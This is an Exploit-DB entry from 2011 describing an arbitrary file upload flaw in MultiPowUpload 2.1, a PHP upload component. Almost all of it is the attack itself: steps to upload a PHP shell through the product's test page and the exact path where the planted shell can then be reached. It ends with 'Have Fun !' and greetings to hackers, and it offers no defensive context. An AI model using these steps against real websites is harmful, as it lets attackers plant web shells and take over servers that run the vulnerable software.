MultiPowUpload 2.1 - Arbitrary File Upload

EDB-ID:

16058

CVE:

N/A


Author:

DIES3L

Type:

webapps


Platform:

PHP

Date:

2011-01-26


[#] Exploit Title:  MultiPowUpload v 2.1 Remote File Upload Vulnerability
[#] Author: DIES3L
[#] Email: zxn@Hotmail.Com
[#] Date: 26-1-2011
[#] Software Link: http://www.element-it.com
[#] Download Software : http://www.element-it.com/Download/ElementIT.MultiPowUpload3.zip
[#] Version: 2.1
[#] Tested on: LiNuX

======================

[-- Exploit --]
http://localhost/[path]/uploadtest.html

+ Click Browse Then Chose Your File [SHELL.php]
+ Your Shell Here :
http://localhost/[path]/FileProcessingScripts/PHP/UploadedFiles/[SHELL.php]

Have Fun !
======================

[-- Greetz To --]
ALL H4ck4rs FroM s4uD1 Ar4b!a ..

======================